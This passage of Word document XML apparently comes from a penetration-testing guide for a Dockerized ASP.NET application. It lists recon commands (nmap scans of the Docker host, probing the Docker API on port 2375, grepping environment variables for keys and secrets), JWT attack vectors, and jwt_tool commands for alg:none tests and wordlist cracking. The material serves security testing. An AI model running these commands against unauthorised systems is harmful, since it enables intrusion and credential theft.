      <w:tr w14:paraId="3816F198">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19F1098E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F083D37">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Test API endpoints and headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A213C67">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>curl -v http://localhost:8080/swagger/v1/swagger.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5AE9C3F0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="633F1435">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Burp Suite / ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05F713BE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Manual proxy to map application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72BD155F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Set browser proxy to 127.0.0.1:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4701DB5E">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="550EB3B7">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3011520B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Capture container-to-host traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23852C51">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Attach to docker0 bridge interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D498AFA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Key Recon Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79656CE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430F3906">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># From HOST - see what's running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B7F0F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66164128">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker network ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE8C25">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker network inspect bridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E367DE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33149660">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># From INSIDE container (after gaining exec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9BBD7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>apt-get update &amp;&amp; apt-get install nmap curl -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707EE37">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>nmap -sV 172.17.0.1   # Scan Docker host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A75EB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>curl http://host.docker.internal:2375/version  # Test Docker API exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A8C38">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>env | grep -E "ASPNETCORE|CONNECTION|KEY|SECRET"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101FDA3">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2: Authentication &amp; Session Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C2006">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Attack Vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13153670">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Weak JWT secrets (default --secret or "secret" in code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD61944">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Lack of token expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4394107B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Privilege escalation via IDOR in claims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249232A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Session fixation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD6CBFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2260"/>
        <w:gridCol w:w="4008"/>
      </w:tblGrid>
      <w:tr w14:paraId="17D9945E">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D5C788F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F89E315">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="776020A0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="111D97D1">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>jwt_tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3755F336">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Test, crack, and forge JWT tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="42CD1D68">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DD09B4D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Burp Sequencer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06E2B883">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Analyze session token randomness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2F19EA8E">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51EDF1E0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Postman</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30650913">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Replay authenticated requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="605E5E9F">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10481C76">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Custom .NET script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39788A4C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Decrypt machine keys if exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F60F1E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Commands &amp; Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652BD85E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E187E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Extract JWT and test for "none" algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE3F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>python3 jwt_tool.py &lt;JWT_TOKEN&gt; -X a   # Test alg:none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997E67F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337288DA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Crack weak secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8F08E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>python3 jwt_tool.py &lt;JWT_TOKEN&gt; -C -d /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
